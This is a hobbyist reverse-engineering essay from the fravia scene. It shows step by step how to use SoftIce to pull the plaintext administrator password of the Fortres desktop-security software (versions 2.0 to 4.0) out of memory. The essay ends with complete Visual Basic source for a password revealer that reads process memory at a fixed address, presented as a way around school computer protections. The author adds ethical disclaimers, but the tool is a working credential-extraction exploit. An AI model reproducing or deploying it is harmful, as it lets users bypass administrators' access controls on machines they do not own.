I will just publish, from now on, the essays I like exactly as I get them.
Authors are invited to And I'll update it.
Note that if the essay should infringe on anyone's copyrights, and if I receive a legitimate request to nuke it, it will immediately disappear from my site, so you'd always better write software reversing essays that are not "specific" target related... so, pointing out deficiencies is OK, individuating "software black holes" is a must, but explaining to lamers how to register (or, even more silly, how to make a coward keygen for the idiots) is definitely NOT "fraviatiquette".
Indeed from now on I want to HELP, not to damage programmers.
This said, I publish this because I reckon that you'll be able to enjoy a very nice hacking/cracking approach. And I believe that protectors should study this with the utmost attention...


where. Thanks and enjoy!



--==[  St0rmer  ]==--



_______________________________________________________________





Greets to all my fellow hackers/crackers. This is my first essay written for fravia, and I doubt it'll be my last.



This essay is intended for both hackers (interested in hacking a computer with Fortres (http://www.fortres.com for more info)) and crackers (interested in using "real-time" patches). I myself used to be a beginner with all of this, so I'll go slowly and try to explain as much as possible.



First, a little background. My high school uses Fortres to "protect" (haha) the Windows95 computers to stop students from writing to the hard-drives, deleting things, etc. I'm always up for a good challenge, so I began to look for ways to get around Fortres. I found literally dozens of "holes" in the security, due to a combination of ignorant administrators who didn't know how to configure it correctly and the fact that Fortres just can't protect a computer 100%, no matter how well it's configured. However, there was one slight problem with all the holes I found... they all required rebooting each time I wanted to deactivate/reactivate Fortres, because the security is run through a VxD (Virtual Device Driver). If you don't know what that is, a VxD is a kernel-mode driver loaded at boot, not an ordinary process, so it can't easily be stopped while Windows is running, and the methods I used to disable Fortres only removed it from boot-up. Keep in mind, all this time I was reporting each hole I found to the network administrator, even though he really didn't care.



A friend of mine who's a programmer by trade (not a cracker) was also interested in getting around Fortres, since he knew I had done it. However, instead of turning the protection off by rebooting, he said, "if Fortres can disable the security itself (with a correct password), then it's possible to make a program to disable the security". Of course, he wasn't a cracker, so he wouldn't really know how to go about doing this kind of stuff. But I thought about what he said, and realized he was right.



When I got home that day I downloaded Fortres 4.0 (the newest version at the time) from http://www.fortres.com, cracked the Installshield installer so I didn't need a password to install it, and got to work. But before I go into that, let me start with version 2.0, build 51, and version 3.0, build 204 (both of which were given to me AFTER I made a program to crack 4.0). In this case, I'll pretend like I cracked 2.0 and 3.0 first since they're a bit simpler. I'll then go on to explain how to crack 4.0, and any other versions that you find laying around.





Here's the "walkthrough"...



All right, I assume you have Fortres 2.0 installed (I tested on build 51). If you're using a different version or build, don't worry; it's still similar. Make sure you have Softice installed too and running. Hackers: Softice is a program that allows debugging of programs so we crackers can see how they work and how to crack them. Beginner Crackers: if you're not very proficient with Softice and/or Assembly, read up at fravia's site. Just make sure you have USER32.DLL loaded in your winice.dat and that when you go into Softice you type 'wd' (to enable the Data Window) and 'wr' (to enable the Register window, the list of registers and their values; 'wf' would give you the floating-point stack window instead, which we don't need here).



Let's press Ctrl-Shift-Esc to bring up the Fortres password dialog box. Type in some random characters and click OK. The box disappeared. Doh, no error message to search for with a disassembler. We'll have to take another approach. Ctrl-Shift-Esc again and enter some random characters. But this time, before clicking OK, go into Softice by pressing Ctrl-D and set breakpoints on the common API functions that retrieve data from text boxes (bpx <command>, where <command> = GetWindowText, GetWindowTextA, GetDlgItemText, and GetDlgItemTextA). You should now have 4 breakpoints set (you usually don't need to use the API calls without A's since most modern programs are 32-bit and only use the A versions). Press F5 to get out of Softice, and click OK in the Fortres password box. Aww... the box disappeared again and Softice didn't pop up. It must not be using one of the above-mentioned API calls. Go back into Softice (Ctrl-D) and do "bc *" to clear all your breakpoints. I used Dependency Walker on fortres.exe (comes with Microsoft Visual Studio Enterprise edition) and found that it uses GetDlgItem. I just wanted to save you the trouble of having to disassemble it unnecessarily. OK, do the same thing as above, but instead of bpx'ing the above functions, bpx GetDlgItem (don't worry, it's not case sensitive). This time Softice should pop up.



Of course we're in user32.dll when Softice comes up because that's what GetDlgItem is from. So press F11 to fast-forward out of the GetDlgItem function. Keep F11'ing (should only be once or twice) until you get into FORTRES!.text. To save you the time, I'll tell you now that it does GetDlgItem three times; we are only going to concentrate on the last time. You'll have to press F11 eight times until you get to the section of FORTRES!.text we want. Look down at the code, and what do we see? CALL [KERNEL32!lstrcmp]. lstrcmp compares two strings. Hmmmmmm... could the two strings be our guessed password and the REAL one??? Let's go line by line (F10) until we get to the first 'push eax' BEFORE lstrcmp. Once we're on 'push eax', type "d ds:eax" to see what the first string is that's being pushed. Gee... that looks like a real password! Go to 'push ecx' and type "d ds:ecx". Gee... that's our guessed password! Now we know that fortres.exe decrypts the real password out of the Fset file (the file that contains the password for Fortres 2.0) into memory, in the clear, where we can simply read it. Don't get too excited though, Fortres 4.0 doesn't make it this easy.



Now for a quick run-through for 3.0 (I tested on build 204), don't worry, it's VERY similar to 2.0. Same deal... set a breakpoint on GetDlgItem. 3.0 runs GetDlgItem twice, we're interested in the second time. Press F11 five times until we get to the section of FORTRES!.text we want, the part with CALL [KERNEL32!lstrcmp] right below it. This time the first 'push eax' is the correct password. Once you're on the first 'push eax' line approaching lstrcmp, do "d ds:eax" as above. There's the password.



Here we go for 4.0 (I tested on build 94). We can keep using GetDlgItem for our breakpoint, but I prefer GetWindowTextA for 4.0 since it supports it. OK, let's Ctrl-Shift-Esc and type in a bogus password. Ctrl-D and 'bpx GetWindowTextA'. F5 out of Softice, and press enter to submit your bogus password. Hello Softice! Let's start looking for that good ol' [KERNEL32!lstrcmp] we saw in Fortres 2.0 and 3.0. It'll hopefully come up before any conditional jumps. Hmm... no luck. It must be inside one of those CALL's. Again, you COULD trace through the two CALL's below, but it'd be easier for me just to tell you where to go and what to look for (if you want to trace through it for the challenge, go for it!). The first call is to capitalize your bogus password. We don't care about this. So we're going to go into the second call. F10 down to it and press F8 to go into the CALL. Blech... looks like a bunch of yucky code. Looks like we'll have to trace through everything... that is, unless we get lucky with the first CALL down there. Let's go right up to the 'push eax' and since we want to know what it's pushing into the CALL (as a parameter), we'll "d ds:eax". Hmm... nothing good, it's probably a dead end... unless it's a memory location for the return value of the CALL. Only one way to find out! F10 past the CALL and what do we get where EAX was? Four bytes of 00's and the correct password! Kick ass!





Implementation...



Now it would be great if the computers you were trying to hack in school or wherever had Softice running on them. Chances are though, they don't. So let's analyze some options. Most computers in high schools in Computer Science classes should have some form of programming language on them. Whether it be C++, Visual Basic, Delphi, TASM, etc., you should be able to write a program to reveal the password as long as you have access. I'll include the source code for the password revealer I wrote for Version 4.0 build 94 which I wrote in Visual Basic (the primary reason I used VB instead of C++ was because it's easier to use Shell() than CreateProcess()). The only thing we need to know beforehand is the address in appmgr.exe's memory where the decrypted password is stored. For 4.0, build 94, the four 00's followed by the password are at &H68E138 (&H<hex value> is used for Hex values in VB; in C++, 0x<hex value> is used). Just to be clear, &H68E138 is the value of EAX right before the CALL that returns the password, described above for 4.0. A fixed number works here because Windows 95 loads appmgr.exe at the same base address every time, so the buffer sits at the same place on every run of the same build. Keep in mind, each version is different, and each build uses a different address. Here's the VB source code for revealing a password for Fortres 4.0, build 94 (I'm not the best coder, so this is in no way "optimized", but it does the trick):



'--------------------------------------------------------
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesRead As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Private Const PROCESS_VM_READ = &H10     'access right needed for ReadProcessMemory
Private Const PROCESS_TERMINATE = &H1    'access right needed for TerminateProcess
Private Const PASSWORD_ADDR = &H68E138   'Fortres 4.0 build 94 ONLY: the four 00's, then the password (varies from build to build)
Private Const MAX_PASSWORD = 20          'maximum number of characters in a Fortres password

Public ProcessID As Long
Public processhandle As Long
'--------------------------------------------------------
Private Sub Form_Load()
    Dim buf(0 To MAX_PASSWORD + 4) As Byte   '4 marker bytes + up to 20 characters + the terminating 0
    Dim bytesRead As Long
    Dim realpass As String
    Dim z As Long

    'Running appmgr.exe is equivalent to Ctrl-Shift-Esc (in versions 2.0 and 3.0, it's fortres.exe).
    'We're keeping the password box hidden just for aesthetics.
    'Shell() gives us the Process ID (PID), which is what OpenProcess wants.
    ProcessID = Shell("c:\fgc\appmgr.exe", vbHide)
    Sleep 500   'give appmgr.exe a moment to start up and fill its buffers before we read them

    'This gets a handle to the appmgr.exe process we loaded. We ask for PROCESS_VM_READ so that
    'we can do the equivalent of "d ds:...", and PROCESS_TERMINATE so we can kill it afterwards.
    processhandle = OpenProcess(PROCESS_VM_READ Or PROCESS_TERMINATE, 0, ProcessID)
    If processhandle = 0 Then
        MsgBox "OpenProcess failed", vbOKOnly, "Fortres password"
        End
    End If

    'This does the equivalent of "d ds:68E138": the 00 marker, the password and its 0 terminator in one read
    If ReadProcessMemory(processhandle, PASSWORD_ADDR, buf(0), UBound(buf) + 1, bytesRead) = 0 Then
        MsgBox "ReadProcessMemory failed", vbOKOnly, "Fortres password"
    ElseIf buf(0) <> 0 Or buf(1) <> 0 Or buf(2) <> 0 Or buf(3) <> 0 Then
        MsgBox "No four 00's at &H" & Hex(PASSWORD_ADDR) & " - wrong version/build?", vbOKOnly, "Fortres password"
    Else
        'Walk the password bytes until the terminating 0, turning each one into a character
        For z = 4 To UBound(buf)
            If buf(z) = 0 Then Exit For
            realpass = realpass & Chr(buf(z))
        Next z
        MsgBox realpass, vbOKOnly, "Fortres password"   'Display the Fortres password
    End If

    'We're all done with appmgr.exe, so terminate it and close the handle
    TerminateProcess processhandle, 0
    CloseHandle processhandle
    End   'Terminate this VB program
End Sub
'--------------------------------------------------------



And that's it! I hope my code is somewhat readable. If you don't understand it 100%, play around with it. Like I said, I didn't really go for optimization, I just wanted to make sure it worked.





Plans for the future...



Well, the whole "secret" on how to "decrypt" Fortres passwords has now been "revealed". What's next? If someone wanted to, they could make a standalone program to import the Fset and/or *.fg* files (the encrypted password files) and have the program decrypt the password. This shouldn't be too difficult, all that's required is stripping the code out of appmgr.exe or fortres.exe (depending on the version of Fortres) that decrypts the password; this is very similar to how key generators are made.



Another idea I had was that everyone who was interested in this could find the respective hex addresses for the version and build of Fortres they have and submit them to me (st0rmer@hotmail.com). I could thus make a database of addresses, and incorporate each one into a Fortres Password Revealer program that would let you specify the version you wanted cracked.





Final comments...



I hope this helped all hackers and crackers interested in breaking through Fortres via reverse engineering. I'd be happy to receive all comments and questions (st0rmer@hotmail.com) you might have; however I'd like to request that you don't e-mail me on "where can I get the full version of Fortres" or "how do I crack Fortres so it doesn't give me an UNREGISTERED nag screen". As of now, you can get the full version of Fortres from http://www.fortres.com, and you can install it with WinZip and Windows Installshield Decompiler. I DO NOT endorse doing this, because this IS software piracy, which IS illegal.



I implore you to use all the information you gained from this essay "for good, not evil". Hack Fortres for the challenge, not to be malicious and delete all the files on your school's computers. Always report any security holes you find to the network administrator (YES, using Fortres to secure the computer is a security hole in itself, as I'm sure I made evident from this essay). If you are a system administrator, just make sure you understand that no matter what you do, there will always be SOME WAY to get around security in a Windows95/98 environment. Either use a different operating system or better system protection.



Thank you for spending your time reading my work. I hope it was as enjoyable and insightful for you to read as it was for me to write.





Greets go out to fravia+, +ORC, HarvestR, Iczelion, Lord Caligo, __y, Filer, Fourteen, Toxic, TooBad, Santa, Compudaze, Zio, TDC, Jimmy Jam, Lithium2, VBRunner, Coinman415, Xcalibur, and Wrexen (in no specific order)